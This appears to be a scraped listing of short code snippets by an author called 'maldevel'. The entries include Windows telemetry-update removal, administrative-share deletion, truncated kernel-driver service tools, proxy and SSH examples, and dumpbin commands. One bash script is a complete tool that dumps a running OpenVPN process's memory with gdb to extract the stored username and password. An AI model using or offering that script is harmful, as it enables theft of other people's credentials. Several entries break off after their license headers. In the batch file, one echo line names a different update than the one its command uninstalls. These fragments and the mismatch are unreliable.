maldevel

echo Uninstalling KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249 /quiet /norestart
echo Uninstalling KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149 /quiet /norestart
echo Uninstalling KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917 /quiet /norestart
echo Uninstalling KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345 /quiet /norestart
echo Uninstalling KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:2976978 /quiet /norestart

maldevel

#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag

grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"

strings *.dump | grep -B2 KnOQ  | grep -v KnOQ
rm *.dump --force

maldevel

@echo off

net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y

maldevel

/*
    ServiceInstaller - Creates a service and starts it to load a driver into Windows kernel.
    Copyright (C) 2015 @maldevel

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,

maldevel

/*
    ServiceUninstaller - Stops a service and removes it to unload a driver from Windows kernel.
    Copyright (C) 2015 @maldevel

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,

maldevel

using System;
using System.Management;

namespace coreinfo
{
    class Program
    {
        static void Main(string[] args)
        {
            PrintCoreInfo();

maldevel

/*
    Copyright (C) 2016 @maldevel

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of

maldevel

import requests
import os 

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

protocol = 'https'
xsrf = 'xsrf-token'

maldevel

## List All Functions containing GenericTable in their name from NTDLL.DLL
dumpbin /EXPORTS "C:\Windows\SysWOW64\ntdll.dll" | grep GenericTable | grep -E -v "Avl$|AvlEx$" | awk {'print $4'} > NTDLL_GenericTable_Methods.txt


##Print RVA (Relative Virtual Address)
dumpbin /EXPORTS "C:\Windows\SysWOW64\ntdll.dll" | grep GenericTable | grep -E -v "Avl$|AvlEx$" | awk {'print $3 " " $4'} > NTDLL_GenericTable_Methods.txt


##Find image base
dumpbin /HEADERS "C:\Windows\SysWOW64\ntdll.dll" | grep "image base"

maldevel

import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('example.com', username='username', password='password')
stdin, stdout, stderr = ssh.exec_command('ls')
lines = stdout.readlines()
for line in lines:
        if line.strip():
                print line